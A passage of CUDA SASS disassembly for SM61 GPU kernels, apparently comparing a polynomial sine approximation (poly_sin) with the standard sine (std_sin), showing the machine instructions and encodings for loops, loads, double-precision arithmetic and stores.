/*02b0*/ DADD R10, R8, R10 ; /* 0x5c70000000a7080a */
/*02b8*/ DFMA R6, R2, R20, c[0x2][0x8] ; /* 0x53700a0800270206 */
/* 0x003c4400fe6027f0 */
/*02c8*/ { FMUL R20, R19, R24 ; /* 0x5c68000001871314 */
/*02d0*/ DEPBAR.LE SB5, 0x5 }
/* 0xf0f0000034570000 */
/*02d8*/ F2F.F64.F32 R8, R18 ; /* 0x5ca8000001270b08 */
/* 0x001cd00206204752 */
/*02e8*/ F2F.F32.F64 R10, R10 ; /* 0x5ca8000000a70e0a */
/*02f0*/ DFMA R4, R4, R6, c[0x2][0x10] ; /* 0x5370030800470404 */
/*02f8*/ F2F.F64.F32 R20, R20 ; /* 0x5ca8000001470b14 */
/* 0x009d4840fe200f01 */
/*0308*/ DMUL R6, R8, c[0x2][0x0] ; /* 0x4c80000800070806 */
/*0310*/ FMUL R19, R18.reuse, R18 ; /* 0x5c68000001271213 */
/*0318*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/* 0x0020c882e6201153 */
/*0328*/ DFMA R4, R20, R4, R2 ; /* 0x5b70010000471404 */
/*0330*/ F2F.F64.F32 R2, R19.reuse ; /* 0x5ca8000001370b02 */
/*0338*/ DFMA R20, R8, R6, c[0x2][0x8] ; /* 0x5370030800270814 */
/* 0x00454404e2800fe2 */
/*0348*/ FMUL R6, R18, R19 ; /* 0x5c68000001371206 */
/*0350*/ DADD R4, R4, R10 ; /* 0x5c70000000a70404 */
/*0358*/ DFMA R20, R2, R20, c[0x2][0x10] ; /* 0x53700a0800470214 */
/* 0x105cc400fe600750 */
/*0368*/ { F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/*0370*/ DEPBAR.LE SB5, 0x4 }
/* 0xf0f0000034470000 */
/*0378*/ F2F.F64.F32 R2, R17.reuse ; /* 0x5ca8000001170b02 */
/* 0x00854c00fc600f11 */
/*0388*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/*0390*/ FMUL R18, R17, R17 ; /* 0x5c68000001171112 */
/*0398*/ DFMA R8, R6, R20, R8 ; /* 0x5b70040001470608 */
/* 0x001c5801ea221731 */
/*03a8*/ DMUL R20, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070214 */
/*03b0*/ F2F.F64.F32 R10, R4 ; /* 0x5ca8000000470b0a */
/*03b8*/ F2F.F64.F32 R6, R18 ; /* 0x5ca8000001270b06 */
/* 0x005fc00428401711 */
/*03c8*/ DFMA R20, R2, R20, c[0x2][0x8] ; /* 0x53700a0800270214 */
/*03d0*/ DADD R8, R8, R10 ; /* 0x5c70000000a70808 */
/*03d8*/ { FMUL R10, R17, R18 ; /* 0x5c6800000127110a */
/* 0x00244400e64007f3 */
/*03e8*/ DEPBAR.LE SB5, 0x3 }
/* 0xf0f0000034370000 */
/*03f0*/ F2F.F64.F32 R4, R16 ; /* 0x5ca8000001070b04 */
/*03f8*/ DFMA R20, R6, R20, c[0x2][0x10] ; /* 0x53700a0800470614 */
/* 0x005c8404ea800711 */
/*0408*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*0410*/ F2F.F32.F64 R8, R8 ; /* 0x5ca8000000870e08 */
/*0418*/ DMUL R6, R4, c[0x2][0x0] ; /* 0x4c80000800070406 */
/* 0x00844801424207f2 */
/*0428*/ FMUL R17, R16.reuse, R16 ; /* 0x5c68000001071011 */
/*0430*/ DFMA R20, R10, R20, R2 ; /* 0x5b70010001470a14 */
/*0438*/ F2F.F64.F32 R10, R8 ; /* 0x5ca8000000870b0a */
/* 0x005f8c022a440751 */
/*0448*/ F2F.F64.F32 R2, R17.reuse ; /* 0x5ca8000001170b02 */
/*0450*/ DFMA R8, R4, R6, c[0x2][0x8] ; /* 0x5370030800270408 */
/*0458*/ FMUL R6, R16, R17 ; /* 0x5c68000001171006 */
/* 0x001d40042a200f13 */
/*0468*/ DADD R10, R20, R10 ; /* 0x5c70000000a7140a */
/*0470*/ DFMA R8, R2, R8, c[0x2][0x10] ; /* 0x5370040800470208 */
/*0478*/ { F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/* 0x003c5002e62007f3 */
/*0488*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0490*/ F2F.F64.F32 R2, R15 ; /* 0x5ca8000000f70b02 */
/*0498*/ F2F.F32.F64 R10, R10 ; /* 0x5ca8000000a70e0a */
/* 0x081fc442e6202143 */
/*04a8*/ DFMA R8, R6, R8, R4 ; /* 0x5b70020000870608 */
/*04b0*/ DMUL R4, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070204 */
/*04b8*/ FMUL R18, R15.reuse, R15 ; /* 0x5c68000000f70f12 */
/* 0x00444480e2200f55 */
/*04c8*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*04d0*/ F2F.F64.F32 R6, R18.reuse ; /* 0x5ca8000001270b06 */
/*04d8*/ DFMA R16, R2, R4, c[0x2][0x8] ; /* 0x5370020800270210 */
/* 0x001fcc04ea0007e1 */
/*04e8*/ FMUL R15, R15, R18 ; /* 0x5c68000001270f0f */
/*04f0*/ { DADD R8, R8, R10 ; /* 0x5c70000000a70808 */
/*04f8*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/* 0x0021c4010e401733 */
/*0508*/ F2F.F64.F32 R4, R14 ; /* 0x5ca8000000e70b04 */
/*0510*/ DFMA R6, R6, R16, c[0x2][0x10] ; /* 0x5370080800470606 */
/*0518*/ F2F.F64.F32 R16, R15 ; /* 0x5ca8000000f70b10 */
/* 0x083fd002e4202752 */
/*0528*/ F2F.F32.F64 R8, R8 ; /* 0x5ca8000000870e08 */
/*0530*/ DMUL R10, R4, c[0x2][0x0] ; /* 0x4c8000080007040a */
/*0538*/ FMUL R15, R14.reuse, R14 ; /* 0x5c68000000e70e0f */
/* 0x103c4404ee204071 */
/*0548*/ DFMA R6, R16, R6, R2 ; /* 0x5b70010000671006 */
/*0550*/ F2F.F64.F32 R8, R8 ; /* 0x5ca8000000870b08 */
/*0558*/ F2F.F64.F32 R2, R15.reuse ; /* 0x5ca8000000f70b02 */
/* 0x011cc802fc801112 */
/*0568*/ DFMA R16, R4, R10, c[0x2][0x8] ; /* 0x5370050800270410 */
/*0570*/ FMUL R10, R14, R15 ; /* 0x5c68000000f70e0a */
/*0578*/ DADD R6, R6, R8 ; /* 0x5c70000000870606 */
/* 0x043c5000ea200851 */
/*0588*/ DFMA R16, R2, R16, c[0x2][0x10] ; /* 0x5370080800470210 */
/*0590*/ F2F.F64.F32 R10, R10 ; /* 0x5ca8000000a70b0a */
/*0598*/ F2F.F64.F32 R2, R13 ; /* 0x5ca8000000d70b02 */
/* 0x083c440428201733 */
/*05a8*/ F2F.F32.F64 R6, R6 ; /* 0x5ca8000000670e06 */
/*05b0*/ DFMA R10, R10, R16, R4 ; /* 0x5b70020001070a0a */
/*05b8*/ DMUL R8, R2.reuse, c[0x2][0x0] ; /* 0x4c80000800070208 */
/* 0x105cc4022a6207f3 */
/*05c8*/ FMUL R14, R13.reuse, R13 ; /* 0x5c68000000d70d0e */
/*05d0*/ F2F.F64.F32 R4, R6 ; /* 0x5ca8000000670b04 */
/*05d8*/ F2F.F64.F32 R6, R14.reuse ; /* 0x5ca8000000e70b06 */
/* 0x009c5001fc400832 */
/*05e8*/ DFMA R16, R2, R8, c[0x2][0x8] ; /* 0x5370040800270210 */
/*05f0*/ FMUL R8, R13, R14 ; /* 0x5c68000000e70d08 */
/*05f8*/ DADD R4, R10, R4 ; /* 0x5c70000000470a04 */
/* 0x003c4402ea600751 */
/*0608*/ F2F.F64.F32 R8, R8 ; /* 0x5ca8000000870b08 */
/*0610*/ DFMA R6, R6, R16, c[0x2][0x10] ; /* 0x5370080800470606 */
/*0618*/ F2F.F32.F64 R4, R4 ; /* 0x5ca8000000470e04 */
/* 0x003cc404e46007f4 */
/*0628*/ IADD32I R22, R22, 0x8 ; /* 0x1c00000000871616 */
/*0630*/ DFMA R6, R8, R6, R2 ; /* 0x5b70010000670806 */
/*0638*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x001fdc02e22007f7 */
/*0648*/ ISETP.NE.AND P0, PT, R22, RZ, PT ; /* 0x5b6b03800ff71607 */
/*0650*/ DADD R4, R6, R4 ; /* 0x5c70000000470604 */
/*0658*/ IADD32I R12, R12, 0x8 ; /* 0x1c00000000870c0c */
/* 0x081fc400ffc00830 */
/*0668*/ { F2F.F32.F64 R10, R4 ; /* 0x5ca8000000470e0a */
/*0670*/ @P0 BRA 0x60 }
/* 0xe2400fff9e80000f */
/*0678*/ SHR R2, R0.reuse, 0x1e ; /* 0x3829000001e70002 */
/* 0x005fd400fc400fe6 */
/*0688*/ ISCADD R4.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470004 */
/*0690*/ IADD.X R5, R2, c[0x0][0x154] ; /* 0x4c10080005570205 */
/*0698*/ STG.E [R4], R10 ; /* 0xeedc20000007040a */
/* 0x001f8000ffe007ff */
/*06a8*/ EXIT ; /* 0xe30000000007000f */
/*06b0*/ BRA 0x6b0 ; /* 0xe2400fffff87000f */
/*06b8*/ NOP; /* 0x50b0000000070f00 */
................................
Function : _Z8poly_sinPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001c4400fe0007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ { MOV R13, RZ ; /* 0x5c9807800ff7000d */
/*0018*/ S2R R0, SR_CTAID.X }
/* 0xf0c8000002570000 */
/* 0x083fc400e7e007f0 */
/*0028*/ { MOV32I R22, 0xffffff00 ; /* 0x010ffffff007f016 */
/*0030*/ S2R R2, SR_TID.X }
/* 0xf0c8000002170002 */
/*0038*/ XMAD.MRG R3, R0.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270003 */
/* 0x001fd800fec217f6 */
/*0048*/ XMAD R2, R0.reuse, c[0x0] [0x8], R2 ; /* 0x4e00010000270002 */
/*0050*/ XMAD.PSL.CBCC R0, R0.H1, R3.H1, R2 ; /* 0x5b30011800370000 */
/*0058*/ MOV R12, R0 ; /* 0x5c9807800007000c */
/* 0x001f8800fcc20ff1 */
/*0068*/ SHR.U32 R3, R12.reuse, 0x1e ; /* 0x3828000001e70c03 */
/*0070*/ ISCADD R2.CC, R12, c[0x0][0x140], 0x2 ; /* 0x4c18810005070c02 */
/*0078*/ IADD.X R3, R3, c[0x0][0x144] ; /* 0x4c10080005170303 */
/* 0x081fc400fec000b1 */
/*0088*/ LDG.E R2, [R2] ; /* 0xeed4200000070202 */
/*0090*/ IADD32I R10, R12, 0x1 ; /* 0x1c00000000170c0a */
/*0098*/ SHR.U32 R4, R10.reuse, 0x1e ; /* 0x3828000001e70a04 */
/* 0x0046c400fc4007e6 */
/*00a8*/ ISCADD R10.CC, R10, c[0x0][0x140], 0x2 ; /* 0x4c18810005070a0a */
/*00b0*/ IADD.X R11, R4, c[0x0][0x144] ; /* 0x4c1008000517040b */
/*00b8*/ LDG.E R14, [R10] ; /* 0xeed4200000070a0e */
/* 0x001f9840fe2007f6 */
/*00c8*/ IADD32I R4, R12, 0x2 ; /* 0x1c00000000270c04 */
/*00d0*/ SHR.U32 R5, R4.reuse, 0x1e ; /* 0x3828000001e70405 */
/*00d8*/ ISCADD R4.CC, R4, c[0x0][0x140], 0x2 ; /* 0x4c18810005070404 */
/* 0x001fd800f62007e2 */
/*00e8*/ IADD.X R5, R5, c[0x0][0x144] ; /* 0x4c10080005170505 */
/*00f0*/ LDG.E R4, [R4] ; /* 0xeed4200000070404 */
/*00f8*/ IADD32I R6, R12, 0x3 ; /* 0x1c00000000370c06 */
/* 0x001f8800fcc20ff1 */
/*0108*/ SHR.U32 R3, R6.reuse, 0x1e ; /* 0x3828000001e70603 */
/*0110*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/*0118*/ IADD.X R7, R3, c[0x0][0x144] ; /* 0x4c10080005170307 */
/* 0x001fd800e22007b1 */
/*0128*/ LDG.E R6, [R6] ; /* 0xeed4200000070606 */
/*0130*/ F2F.F64.F32 R26, R13 ; /* 0x5ca8000000d70b1a */
/*0138*/ IADD32I R22, R22, 0x4 ; /* 0x1c00000000471616 */
/* 0x001fcc00fd8007e1 */
/*0148*/ ISETP.NE.AND P0, PT, R22, RZ, PT ; /* 0x5b6b03800ff71607 */
/*0150*/ IADD32I R12, R12, 0x4 ; /* 0x1c00000000470c0c */
/*0158*/ DEPBAR.LE SB5, 0x3 ; /* 0xf0f0000034370000 */
/* 0x009cf804ebc0075e */
/*0168*/ F2F.F64.F32 R8, R2 ; /* 0x5ca8000000270b08 */
/*0170*/ DMUL R2, R8, c[0x2][0x0] ; /* 0x4c80000800070802 */
/*0178*/ DMUL R2, R8, R2 ; /* 0x5c80000000270802 */
/* 0x0045c800fe621150 */
/*0188*/ { DMUL R10, R8.reuse, R2 ; /* 0x5c8000000027080a */
/*0190*/ DEPBAR.LE SB5, 0x2 }
/* 0xf0f0000034270000 */
/*0198*/ F2F.F64.F32 R2, R14 ; /* 0x5ca8000000e70b02 */
/* 0x011d8804ea621733 */
/*01a8*/ DMUL R14, R8.reuse, c[0x2][0x8] ; /* 0x4c8000080027080e */
/*01b0*/ DMUL R10, R8, R10 ; /* 0x5c80000000a7080a */
/*01b8*/ DMUL R16, R2, c[0x2][0x0] ; /* 0x4c80000800070210 */
/* 0x011dc844ea621733 */
/*01c8*/ DMUL R14, R8.reuse, R14 ; /* 0x5c80000000e7080e */
/*01d0*/ DMUL R10, R8.reuse, R10 ; /* 0x5c80000000a7080a */
/*01d8*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/* 0x001e4400fe621230 */
/*01e8*/ { DMUL R18, R8.reuse, R14 ; /* 0x5c80000000e70812 */
/*01f0*/ DEPBAR.LE SB5, 0x1 }
/* 0xf0f0000034170000 */
/*01f8*/ F2F.F64.F32 R4, R4 ; /* 0x5ca8000000470b04 */
/* 0x08444448ee402142 */
/*0208*/ DMUL R14, R8, R10 ; /* 0x5c80000000a7080e */
/*0210*/ DMUL R16, R2.reuse, R16 ; /* 0x5c80000001070210 */
/*0218*/ DMUL R10, R8.reuse, R18 ; /* 0x5c8000000127080a */
/* 0x00914842e6400711 */
/*0228*/ DMUL R20, R2, c[0x2][0x8] ; /* 0x4c80000800270214 */
/*0230*/ DMUL R18, R8.reuse, c[0x2][0x10] ; /* 0x4c80000800470812 */
/*0238*/ DMUL R24, R8, R14 ; /* 0x5c80000000e70818 */
/* 0x083c4448ee408781 */
/*0248*/ DMUL R14, R4, c[0x2][0x0] ; /* 0x4c8000080007040e */
/*0250*/ DMUL R16, R2.reuse, R16 ; /* 0x5c80000001070210 */
/*0258*/ DMUL R20, R2.reuse, R20 ; /* 0x5c80000001470214 */
/* 0x021d4404e6421732 */
/*0268*/ DMUL R18, R8.reuse, R18 ; /* 0x5c80000001270812 */
/*0270*/ DFMA R10, R8, R10, R24 ; /* 0x5b700c0000a7080a */
/*0278*/ DMUL R14, R4, R14 ; /* 0x5c80000000e7040e */
/* 0x083c4c20f2204761 */
/*0288*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/*0290*/ F2F.F64.F32 R6, R6 ; /* 0x5ca8000000670b06 */
/*0298*/ DMUL R20, R2.reuse, R20 ; /* 0x5c80000001470214 */
/* 0x011dc404ea201732 */
/*02a8*/ DFMA R10, R8, R18, R10 ; /* 0x5b7005000127080a */
/*02b0*/ DMUL R14, R4, R14 ; /* 0x5c80000000e7040e */
/*02b8*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/* 0x00444841e2608781 */
/*02c8*/ DMUL R24, R6, c[0x2][0x0] ; /* 0x4c80000800070618 */
/*02d0*/ DMUL R20, R2.reuse, R20 ; /* 0x5c80000001470214 */
/*02d8*/ DADD R8, R8, R10 ; /* 0x5c70000000a70808 */
/* 0x005cc44862222751 */
/*02e8*/ DMUL R14, R4.reuse, R14 ; /* 0x5c80000000e7040e */
/*02f0*/ DMUL R18, R2.reuse, R16 ; /* 0x5c80000001070212 */
/*02f8*/ DMUL R10, R4, c[0x2][0x8] ; /* 0x4c8000080027040a */
/* 0x003c4810f2404761 */
/*0308*/ DMUL R16, R2, c[0x2][0x10] ; /* 0x4c80000800470210 */
/*0310*/ DMUL R24, R6, R24 ; /* 0x5c80000001870618 */
/*0318*/ DADD R8, R8, R26 ; /* 0x5c70000001a70808 */
/* 0x005cc440e2222751 */
/*0328*/ DMUL R14, R4.reuse, R14 ; /* 0x5c80000000e7040e */
/*0330*/ DFMA R20, R2.reuse, R20, R18 ; /* 0x5b70090001470214 */
/*0338*/ DMUL R10, R4, R10 ; /* 0x5c80000000a7040a */
/* 0x00204850f2404761 */
/*0348*/ DMUL R16, R2, R16 ; /* 0x5c80000001070210 */
/*0350*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/*0358*/ F2F.F32.F64 R13, R8 ; /* 0x5ca8000000870e0d */
/* 0x011dc402e6222752 */
/*0368*/ DMUL R14, R4.reuse, R14 ; /* 0x5c80000000e7040e */
/*0370*/ DMUL R10, R4, R10 ; /* 0x5c80000000a7040a */
/*0378*/ DFMA R16, R2, R16, R20 ; /* 0x5b700a0001070210 */
/* 0x08884810f2600f01 */
/*0388*/ DMUL R8, R6, c[0x2][0x8] ; /* 0x4c80000800270608 */
/*0390*/ DMUL R24, R6, R24 ; /* 0x5c80000001870618 */
/*0398*/ DMUL R18, R4.reuse, R14 ; /* 0x5c80000000e70412 */
/* 0x010c4804ea221731 */
/*03a8*/ DMUL R10, R4.reuse, R10 ; /* 0x5c80000000a7040a */
/*03b0*/ DMUL R14, R4, c[0x2][0x10] ; /* 0x4c8000080047040e */
/*03b8*/ DADD R16, R2, R16 ; /* 0x5c70000001070210 */
/* 0x0a1e4841e2204761 */
/*03c8*/ F2F.F64.F32 R2, R13 ; /* 0x5ca8000000d70b02 */
/*03d0*/ DMUL R8, R6.reuse, R8 ; /* 0x5c80000000870608 */
/*03d8*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/* 0x011d4404e6621731 */
/*03e8*/ DFMA R10, R4.reuse, R10, R18 ; /* 0x5b70090000a7040a */
/*03f0*/ DMUL R14, R4, R14 ; /* 0x5c80000000e7040e */
/*03f8*/ DADD R2, R16, R2 ; /* 0x5c70000000271002 */
/* 0x005ccc50ee600f01 */
/*0408*/ DMUL R8, R6, R8 ; /* 0x5c80000000870608 */
/*0410*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/*0418*/ DFMA R10, R4, R14, R10 ; /* 0x5b70050000e7040a */
/* 0x091c4441e2202751 */
/*0428*/ F2F.F32.F64 R2, R2 ; /* 0x5ca8000000270e02 */
/*0430*/ DMUL R8, R6.reuse, R8 ; /* 0x5c80000000870608 */
/*0438*/ DMUL R24, R6.reuse, R24 ; /* 0x5c80000001870618 */
/* 0x009cc80246600762 */
/*0448*/ DMUL R16, R6, c[0x2][0x10] ; /* 0x4c80000800470610 */
/*0450*/ DADD R10, R4, R10 ; /* 0x5c70000000a7040a */
/*0458*/ F2F.F64.F32 R4, R2 ; /* 0x5ca8000000270b04 */
/* 0x005cc848e2c20f11 */
/*0468*/ DFMA R8, R6.reuse, R8, R24 ; /* 0x5b700c0000870608 */
/*0470*/ DMUL R16, R6.reuse, R16 ; /* 0x5c80000001070610 */
/*0478*/ DADD R4, R10, R4 ; /* 0x5c70000000470a04 */
/* 0x003c5802e4400f16 */
/*0488*/ DFMA R8, R6, R16, R8 ; /* 0x5b70040001070608 */
/*0490*/ F2F.F32.F64 R2, R4 ; /* 0x5ca8000000470e02 */
/*0498*/ DADD R8, R6, R8 ; /* 0x5c70000000870608 */
/* 0x0020c001e3c0171e */
/*04a8*/ F2F.F64.F32 R2, R2 ; /* 0x5ca8000000270b02 */
/*04b0*/ DADD R2, R8, R2 ; /* 0x5c70000000270802 */
/*04b8*/ { F2F.F32.F64 R13, R2 ; /* 0x5ca8000000270e0d */
/* 0x001f9841fe2007fe */
/*04c8*/ @P0 BRA 0x60 }
/* 0xe2400fffb900000f */
/*04d0*/ SHR R3, R0.reuse, 0x1e ; /* 0x3829000001e70003 */
/*04d8*/ ISCADD R2.CC, R0, c[0x0][0x150], 0x2 ; /* 0x4c18810005470002 */
/* 0x001ffc02fea007e2 */
/*04e8*/ IADD.X R3, R3, c[0x0][0x154] ; /* 0x4c10080005570303 */
/*04f0*/ STG.E [R2], R13 ; /* 0xeedc20000007020d */
/*04f8*/ EXIT ; /* 0xe30000000007000f */
/* 0x001f8000fc0007ff */
/*0508*/ BRA 0x500 ; /* 0xe2400fffff07000f */
/*0510*/ NOP; /* 0x50b0000000070f00 */
/*0518*/ NOP; /* 0x50b0000000070f00 */
/* 0x001f8000fc0007e0 */
/*0528*/ NOP; /* 0x50b0000000070f00 */
/*0530*/ NOP; /* 0x50b0000000070f00 */
/*0538*/ NOP; /* 0x50b0000000070f00 */
...............................
Function : _Z7std_sinPKfS0_Pfi
.headerflags @"EF_CUDA_SM61 EF_CUDA_PTX_SM(EF_CUDA_SM61)"
/* 0x001fc400fe2007f6 */
/*0008*/ MOV R1, c[0x0][0x20] ; /* 0x4c98078000870001 */
/*0010*/ IADD32I R1, R1, -0x20 ; /* 0x1c0ffffffe070101 */
/*0018*/ MOV R2, RZ ; /* 0x5c9807800ff70002 */
/* 0x001c4400fec007f4 */
/*0028*/ MOV R3, RZ ; /* 0x5c9807800ff70003 */
/*0030*/ IADD R11, R1, c[0x0][0x4] ; /* 0x4c1000000017010b */
/*0038*/ S2R R4, SR_CTAID.X ; /* 0xf0c8000002570004 */
/* 0x001fc441fe00073f */
/*0048*/ S2R R5, SR_TID.X ; /* 0xf0c8000002170005 */
/*0050*/ { XMAD.MRG R6, R4.reuse, c[0x0] [0x8].H1, RZ ; /* 0x4f107f8000270406 */
/*0058*/ SSY 0x490 }
/* 0xe290000043000000 */
/* 0x001fd800fcc017e6 */
/*0068*/ XMAD R5, R4, c[0x0] [0x8], R5 ; /* 0x4e00028000270405 */
/*0070*/ XMAD.PSL.CBCC R4, R4.H1, R6.H1, R5 ; /* 0x5b30029800670404 */
/*0078*/ IADD R6, R4, R3 ; /* 0x5c10000000370406 */
/* 0x001f8800fcc207f1 */
/*0088*/ SHR.U32 R0, R6.reuse, 0x1e ; /* 0x3828000001e70600 */
/*0090*/ ISCADD R6.CC, R6, c[0x0][0x140], 0x2 ; /* 0x4c18810005070606 */
/*0098*/ IADD.X R7, R0, c[0x0][0x144] ; /* 0x4c10080005170007 */
/* 0x041fb400fe8007b1 */
/*00a8*/ LDG.E R5, [R6] ; /* 0xeed4200000070605 */
/*00b0*/ IADD32I R3, R3, 0x1 ; /* 0x1c00000000170303 */
/*00b8*/ FSETP.NEU.AND P0, PT, |R5|, +INF , PT ; /* 0x36bd03ff80070587 */
/* 0x001c4400fc4007e6 */
/*00c8*/ @!P0 FMUL R5, RZ, R5 ; /* 0x5c6800000058ff05 */
/*00d0*/ FMUL32I R0, R5, 0.63661974668502807617 ; /* 0x1e03f22f98370500 */
/*00d8*/ F2I.S32.F32 R0, R0 ; /* 0x5cb0000000071a00 */
/* 0x001f8401e22007e1 */
/*00e8*/ FSETP.GT.AND P1, PT, |R5|, c[0x2][0xc], PT ; /* 0x4bb403880037058f */
/*00f0*/ I2F.F32.S32 R8, R0 ; /* 0x5cb8000000072a08 */
/*00f8*/ ISETP.GE.U32.AND P0, PT, R3, 0x100, PT ; /* 0x366c038010070307 */
/* 0x001fc000fcc00fe6 */
/*0108*/ FFMA R9, R8, -c[0x2][0x0], R5 ; /* 0x4981028800070809 */
/*0110*/ FFMA R9, R8, -c[0x2][0x4], R9 ; /* 0x4981048800170809 */
/*0118*/ { FFMA R8, R8, -c[0x2][0x8], R9 ; /* 0x4981048800270808 */
/* 0x001fc400fe2007fd */
/*0128*/ @!P1 SYNC }
/* 0xf0f800000009000f */
/*0130*/ SHL R6, R5, 0x8 ; /* 0x3848000000870506 */
/*0138*/ MOV R0, R1 ; /* 0x5c98078000170000 */
/* 0x001fc800fe2007f1 */
/*0148*/ MOV R7, RZ ; /* 0x5c9807800ff70007 */
/*0150*/ MOV R14, RZ ; /* 0x5c9807800ff7000e */
/*0158*/ MOV32I R8, 0xfffffffa ; /* 0x010fffffffa7f008 */
/* 0x0000d800fe0007e6 */
/*0168*/ LOP32I.OR R16, R6, 0x80000000 ; /* 0x0428000000070610 */
/*0170*/ { IADD32I R8, R8, 0x1 ; /* 0x1c00000000170808 */
/*0178*/ LDC R6, c[0x3][R14] }
/* 0xef94003000070e06 */
/* 0x185fc401fe2007f1 */
/*0188*/ ISETP.NE.AND P1, PT, R8, RZ, PT ; /* 0x5b6b03800ff7080f */
/*0190*/ IADD32I R14, R14, 0x4 ; /* 0x1c00000000470e0e */
/*0198*/ XMAD R9, R6.reuse, R16.reuse, RZ ; /* 0x5b007f8001070609 */
/* 0x181fcc00fc2607f1 */
/*01a8*/ XMAD.MRG R12, R6.reuse, R16.H1.reuse, RZ ; /* 0x5b007fa80107060c */
/*01b0*/ XMAD R10, R6, R16.H1, RZ ; /* 0x5b007f880107060a */
/*01b8*/ XMAD R13, R6.H1.reuse, R16.H1.reuse, RZ ; /* 0x5b207f880107060d */
/* 0x001fc400feaa07f1 */
/*01c8*/ XMAD.CHI R15, R6.H1.reuse, R16, R9.reuse ; /* 0x5b2804800107060f */
/*01d0*/ XMAD.PSL.CBCC R6, R6.H1, R12.H1, R9 ; /* 0x5b30049800c70606 */
/*01d8*/ IADD3.RS R10, R15, R10, R13 ; /* 0x5cc006a000a70f0a */
/* 0x001ff4001ee007f6 */
/*01e8*/ IADD R6.CC, R7, R6 ; /* 0x5c10800000670706 */
/*01f0*/ STL [R0], R6 ; /* 0xef54000000070006 */
/*01f8*/ IADD.X R7, RZ, R10 ; /* 0x5c10080000a7ff07 */
/* 0x081fc400ffa00ff0 */
/*0208*/ { IADD32I R0, R0, 0x4 ; /* 0x1c00000000470000 */
/*0210*/ @P1 BRA 0x170 }
/* 0xe2400ffff581000f */
/*0218*/ BFE.U32 R0, R5.reuse, 0x817 ; /* 0x3800000081770500 */
/* 0x001fd400fe2007e5 */
/*0228*/ BFE.U32 R15, R5, 0x517 ; /* 0x380000005177050f */
/*0230*/ IADD32I R0, R0, -0x80 ; /* 0x1c0ffffff8070000 */
/*0238*/ ISETP.NE.AND P1, PT, R15, RZ, PT ; /* 0x5b6b03800ff70f0f */
/* 0x001fc000fca007e1 */
/*0248*/ SHR.U32 R0, R0, 0x5 ; /* 0x3828000000570000 */
/*0250*/ IADD R13, R11, -c[0x0][0x4] ; /* 0x4c11000000170b0d */
/*0258*/ { IADD32I R0, -R0, 0x6 ; /* 0x1d00000000670000 */
/* 0x001ec400fc4007f6 */
/*0268*/ STL [R13+0x18], R7 }
/* 0xef54000001870d07 */
/*0270*/ LEA R14, R0, R13, 0x2 ; /* 0x5bd7010000d7000e */
/*0278*/ @P1 LDL R10, [R14+-0x8] ; /* 0xef440fffff810e0a */
/* 0x001ff400162007b1 */
/*0288*/ LDL R0, [R14] ; /* 0xef44000000070e00 */
/*0290*/ LDL R6, [R14+-0x4] ; /* 0xef440fffffc70e06 */
/*0298*/ @P1 IADD32I R8, -R15, 0x20 ; /* 0x1d00000002010f08 */
/* 0x001f8420fe200ff1 */
/*02a8*/ MOV32I R14, 0xc90fdaa2 ; /* 0x010c90fdaa27f00e */
/*02b0*/ @P1 SHR.U32 R10, R10, R8 ; /* 0x5c28000000810a0a */
/*02b8*/ @P1 SHL R9, R0, R15 ; /* 0x5c48000000f10009 */
/* 0x001f8400fca007f1 */
/*02c8*/ @P1 SHR.U32 R8, R6, R8 ; /* 0x5c28000000810608 */
/*02d0*/ @P1 SHL R12, R6, R15 ; /* 0x5c48000000f1060c */
/*02d8*/ @P1 IADD R0, R8, R9 ; /* 0x5c10000000910800 */
/* 0x001fd800fec007f6 */
/*02e8*/ @P1 IADD R6, R10, R12 ; /* 0x5c10000000c10a06 */
/*02f0*/ SHF.L R12, R6, 0x2, R0 ; /* 0x36f800000027060c */
/*02f8*/ SHR.U32 R7, R12, 0x1f ; /* 0x3828000001f70c07 */
/* 0x001fc400fd8007f1 */
/*0308*/ ISETP.NE.AND P1, PT, R7, RZ, PT ; /* 0x5b6b03800ff7070f */
/*0310*/ SHL R9, R6, 0x2 ; /* 0x3848000000270609 */
/*0318*/ @P1 LOP.PASS_B R6, RZ, ~R12 ; /* 0x5c47070000c1ff06 */
/* 0x001c4400fc4007e6 */
/*0328*/ @P1 ICMP.NE R8, RZ, 0x1, R9 ; /* 0x364b04800011ff08 */
/*0330*/ @P1 IADD R12, R6, R8 ; /* 0x5c1000000081060c */
/*0338*/ FLO.U32 R8, R12 ; /* 0x5c30000000c70008 */
/* 0x003fd800ffa007e1 */
/*0348*/ @P1 IADD R6, -R9, RZ ; /* 0x5c1200000ff10906 */
/*0350*/ @!P1 MOV R6, R9 ; /* 0x5c98078000990006 */
/*0358*/ IADD32I R10, -R8, 0x1f ; /* 0x1d00000001f7080a */
/* 0x001fd400fe2007e1 */
/*0368*/ ISETP.EQ.AND P2, PT, R10, RZ, PT ; /* 0x5b6503800ff70a17 */
/*0370*/ IADD32I R9, -R10, 0x20 ; /* 0x1d00000002070a09 */
/*0378*/ SHL R8, R12, R10 ; /* 0x5c48000000a70c08 */
/* 0x001f8400fcc007e6 */
